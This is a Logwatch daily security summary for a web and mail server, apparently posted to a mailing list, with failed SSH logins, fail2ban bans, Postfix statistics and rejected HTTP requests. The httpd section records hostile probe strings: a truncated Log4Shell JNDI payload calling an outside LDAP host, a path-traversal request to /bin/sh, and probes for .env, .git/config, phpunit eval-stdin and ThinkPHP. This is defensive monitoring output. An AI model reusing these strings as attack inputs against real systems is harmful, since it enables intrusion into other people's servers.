04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 31 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-30 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:33 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
92.118.234.202 -> zapf.wiki:443: 12 Time(s)
A total of 6 sites probed the server
128.199.246.175
165.227.221.200
172.104.131.24
188.166.181.21
20.70.171.75
66.240.205.34
Requests with error response codes
400 Bad Request
null: 15 Time(s)
zapf.wiki:443: 12 Time(s)
/phpmyadmin/scripts/setup.php: 4 Time(s)
mstshash=Domain: 4 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
mstshash=Administr: 2 Time(s)
/: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
HTTP/1.0: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
499 (undefined)
/favicon.png: 1 Time(s)
500 Internal Server Error
/: 23 Time(s)
/.env: 22 Time(s)
/.git/config: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/ecp/G.js: 1 Time(s)
/fuel: 1 Time(s)
/fuel/modules/fuel/assets/css/fuel.css: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
502 Bad Gateway
/CHO4Nbt0R1Snvl2XTRiSeg/pdf: 2 Time(s)
/EqMyG1IhRACunNpuLsKWYQ/pdf: 1 Time(s)
/siegen17/pdf: 1 Time(s)
/socket.io/?noteId=CHO4Nbt0R1Snvl2XTRiSeg& ... lling&t=NuC_17t: 1 Time(s)
/socket.io/?noteId=CHO4Nbt0R1Snvl2XTRiSeg& ... lling&t=NuC_2sQ: 1 Time(s)
/socket.io/?noteId=EqMyG1IhRACunNpuLsKWYQ& ... lling&t=NuC_WGU: 1 Time(s)
/socket.io/?noteId=EqMyG1IhRACunNpuLsKWYQ& ... lling&t=NuC_WIk: 1 Time(s)
/socket.io/?noteId=EqMyG1IhRACunNpuLsKWYQ& ... lling&t=NuC_WYX: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (92.119.159.104): 34 Time(s)
root (softbank126077170137.bbtec.net): 33 Time(s)
root (202.101.186.218): 23 Time(s)
unknown (175.126.73.16): 21 Time(s)
root (104.248.181.156): 17 Time(s)
root (120.53.245.68): 17 Time(s)
unknown (softbank126077170137.bbtec.net): 17 Time(s)
root (103.90.226.179): 15 Time(s)
unknown (92.119.159.104): 13 Time(s)
unknown (202.101.186.218): 12 Time(s)
root (mail.wooree42.com): 11 Time(s)
unknown (103.90.226.179): 11 Time(s)
root (223.85.112.162): 10 Time(s)
root (125.69.161.113): 9 Time(s)
unknown (104.248.181.156): 8 Time(s)
unknown (125.69.161.113): 8 Time(s)
root (123.134.167.62): 7 Time(s)
unknown (223.85.112.162): 7 Time(s)
unknown (120.53.245.68): 6 Time(s)
unknown (mail.wooree42.com): 6 Time(s)
root (112.229.218.18): 4 Time(s)
root (210.22.128.214): 4 Time(s)
unknown (141.98.10.82): 3 Time(s)
root (1.235.192.218): 2 Time(s)
unknown (46.19.139.18): 2 Time(s)
unknown (host-79-9-21-146.business.telecomitalia.it): 2 Time(s)
root (116.52.144.172): 1 Time(s)
root (175.126.73.16): 1 Time(s)
root (61-91-169-206.static.asianet.co.th): 1 Time(s)
unknown (112.229.218.18): 1 Time(s)
unknown (118.99.79.194): 1 Time(s)
unknown (123.134.167.62): 1 Time(s)
unknown (210.22.128.214): 1 Time(s)
unknown (211.76.125.186): 1 Time(s)
unknown (62.233.50.53): 1 Time(s)
unknown (slot0.epaperitaliait.com): 1 Time(s)
unknown (static.203.21.itcsa.net): 1 Time(s)
Invalid Users:
Unknown Account: 124 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.874K Bytes accepted 10,111
9.874K Bytes sent via SMTP 10,111
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
185 Connections
13 Connections lost (inbound)
185 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.235.192.218: 2 times
61.91.169.206 (61-91-169-206.static.asianet.co.th): 1 time
92.119.159.104: 34 times
103.90.226.179: 15 times
104.248.181.156: 17 times
112.229.218.18: 4 times
116.52.144.172: 1 time
120.53.245.68: 17 times
123.134.167.62: 7 times
125.69.161.113: 9 times
126.77.170.137 (softbank126077170137.bbtec.net): 33 times
175.126.73.16: 1 time
202.101.186.218: 23 times
210.22.128.214: 4 times
211.238.111.61 (mail.wooree42.com): 11 times
223.85.112.162: 10 times
Illegal users from:
2001:470:1:c84::15: 1 time
undef: 103 times
46.19.139.18 (theta.pokemon-vortex.com): 2 times
62.233.50.53: 1 time
65.49.20.67 (scan-18.shadowserver.org): 1 time
79.9.21.146 (host-79-9-21-146.business.telecomitalia.it): 2 times
92.119.159.104: 13 times
103.90.226.179: 11 times
104.248.181.156: 8 times
112.229.218.18: 1 time
118.99.79.194: 1 time
120.53.245.68: 6 times
123.134.167.62: 1 time
125.69.161.113: 8 times
126.77.170.137 (softbank126077170137.bbtec.net): 17 times
141.98.10.82: 3 times
175.126.73.16: 21 times
190.15.203.21 (static.203.21.itcsa.net): 1 time
195.133.18.24 (slot0.epaperitaliait.com): 1 time
202.101.186.218: 12 times
210.22.128.214: 1 time
211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time
211.238.111.61 (mail.wooree42.com): 6 times
223.85.112.162: 7 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
1388
days inactive
1388
days old
0 comments
1 participants
participants (1)
-
root@zapf.in